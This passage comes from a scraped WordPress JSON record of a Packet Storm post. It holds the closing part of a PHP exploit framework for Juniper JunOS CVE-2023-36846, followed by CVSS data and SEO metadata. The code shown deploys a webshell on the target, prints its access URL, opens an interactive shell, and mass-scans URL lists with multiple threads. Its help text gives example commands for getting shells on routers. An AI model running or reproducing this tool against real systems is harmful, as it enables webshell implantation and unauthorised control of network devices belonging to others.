  if (strtolower($confirm) !== &#8216;y&#8217;) {\\n                        exit(1);\\n                    }\\n                }\\n                \\n                $exploiter = $scanner-\\u003egetExploitInstance();\\n                $files = $exploiter-\\u003edeployWebshell();\\n                \\n                echo \\&#8221;[+] Webshell deployed successfully\\\\n\\&#8221;;\\n                echo \\&#8221;[+] PHP file: {$files[&#8216;php&#8217;]}\\\\n\\&#8221;;\\n                echo \\&#8221;[+] INI file: {$files[&#8216;ini&#8217;]}\\\\n\\&#8221;;\\n                echo \\&#8221;[+] Access URL: {$files[&#8216;shell_url&#8217;]}\\\\n\\\\n\\&#8221;;\\n                \\n                $shell = new InteractiveShell($exploiter);\\n                $shell-\\u003erun();\\n                \\n            } catch (Exception $e) {\\n                echo \\&#8221;[!] Error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n            \\n            exit(0);\\n        }\\n        \\n        if ($file) {\\n            try {\\n                $urls = Utils::parseUrlsFile($file);\\n                if (empty($urls)) {\\n                    echo \\&#8221;[!] No valid URLs found in file\\\\n\\&#8221;;\\n                    exit(1);\\n                }\\n                \\n                $scanner = new BatchScanner($threads, $output, $verbose, $verifySSL);\\n                $results = $scanner-\\u003escanUrls($urls);\\n                \\n                if (!empty($results)) {\\n                    echo \\&#8221;\\\\n[*] Vulnerable hosts found:\\\\n\\&#8221;;\\n                    foreach ($results as $vulnUrl) {\\n                        echo \\&#8221;  &#8211; {$vulnUrl}\\\\n\\&#8221;;\\n                    }\\n                }\\n                \\n            } catch (Exception $e) {\\n                echo \\&#8221;[!] Error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n            \\n            exit(0);\\n        }\\n        \\n        echo \\&#8221;[!] Invalid arguments\\\\n\\&#8221;;\\n        showHelp();\\n        exit(1);\\n    }\\n    \\n    function showHelp() {\\n        echo \\u003c\\u003c\\u003cHELP\\n    JunOS CVE-2023-36846 Scanner \\u0026 Exploit Framework by indoushka\\n    =============================================================\\n    \\n    Usage modes:\\n      php junos_exploit.php -u URL [OPTIONS]      # Interactive shell\\n      php junos_exploit.php -u URL -r             # Quick vulnerability check\\n      php junos_exploit.php -f FILE [OPTIONS]     # Batch scan\\n    \\n    Options:\\n      -u, &#8211;url URL        Target URL (https:\/\/target.com)\\n      -f, &#8211;file FILE      File containing URLs (one per line)\\n      -t, &#8211;threads N      Threads for batch scan (1-50, default: 5)\\n      -o, &#8211;output FILE    Save vulnerable hosts to file\\n      -v, &#8211;verbose        Enable verbose output\\n      -s, &#8211;ssl            Enable SSL certificate verification\\n      -r, &#8211;report         Report only mode (no exploitation)\\n      -h, &#8211;help           Show this help\\n    \\n    Examples:\\n      # Quick check\\n      php junos_exploit.php -u https:\/\/192.168.1.1 -r -v\\n      \\n      # Interactive shell\\n      php junos_exploit.php -u https:\/\/vuln-router.local -v\\n      \\n      # Batch scan\\n      php junos_exploit.php -f targets.txt -t 10 -o vuln.txt -v\\n      \\n      # Batch scan with SSL verification\\n      php junos_exploit.php -f targets.txt -s -o secure_scan.txt\\n    \\n    Security Notes:\\n      \u2022 Use only on authorized systems\\n      \u2022 SSL verification is disabled by default for testing\\n      \u2022 Tool performs auto-cleanup after exploitation\\n      \u2022 Random file names prevent collisions\\n    \\n    HELP;\\n    }\\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n    \\n        $requiredExts = [&#8216;curl&#8217;];\\n        $missingExts = [];\\n        \\n        foreach ($requiredExts as $ext) {\\n            if (!extension_loaded($ext)) {\\n                $missingExts[] = $ext;\\n            }\\n        }\\n        \\n        if (!empty($missingExts)) {\\n            echo \\&#8221;[!] Missing PHP extensions: \\&#8221; . implode(&#8216;, &#8216;, $missingExts) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;[!] Install with: sudo apt-get install php-curl\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        declare(ticks = 1);\\n        pcntl_signal(SIGINT, function() {\\n            echo \\&#8221;\\\\n[*] Interrupted by user. Exiting&#8230;\\\\n\\&#8221;;\\n            exit(0);\\n        });\\n        \\n        try {\\n            main();\\n        } catch (Exception $e) {\\n            echo \\&#8221;[!] Fatal error: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    } else {\\n        header(&#8216;HTTP\/1.1 403 Forbidden&#8217;);\\n        echo \\&#8221;This tool must be run from command line\\\\n\\&#8221;;\\n        exit(1);\\n    }\\n    \\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214349&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:5.3,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214349\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-26T18:14:52&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,22,12,21,13,53,7,11,5],"class_list":["post-37262","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-53","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37262\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-26T18:14:52&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37262\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-26T12:39:47+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \\\/ Exploitation Framework_PACKETSTORM:214349\",\"datePublished\":\"2026-01-26T12:39:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262\"},\"wordCount\":3430,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.3\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37262#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262\",\"name\":\"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \\\/ Exploitation Framework_PACKETSTORM:214349 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-26T12:39:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37262\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37262#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \\\/ Exploitation Framework_PACKETSTORM:214349\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37262","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-26T18:14:52&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is...","og_url":"https:\/\/zero.redgem.net\/?p=37262","og_site_name":"zero redgem","article_published_time":"2026-01-26T12:39:47+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37262#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37262"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349","datePublished":"2026-01-26T12:39:47+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37262"},"wordCount":3430,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-5.3","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37262#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37262","url":"https:\/\/zero.redgem.net\/?p=37262","name":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-26T12:39:47+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37262#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37262"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37262#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework_PACKETSTORM:214349"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37262","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37262"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37262\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}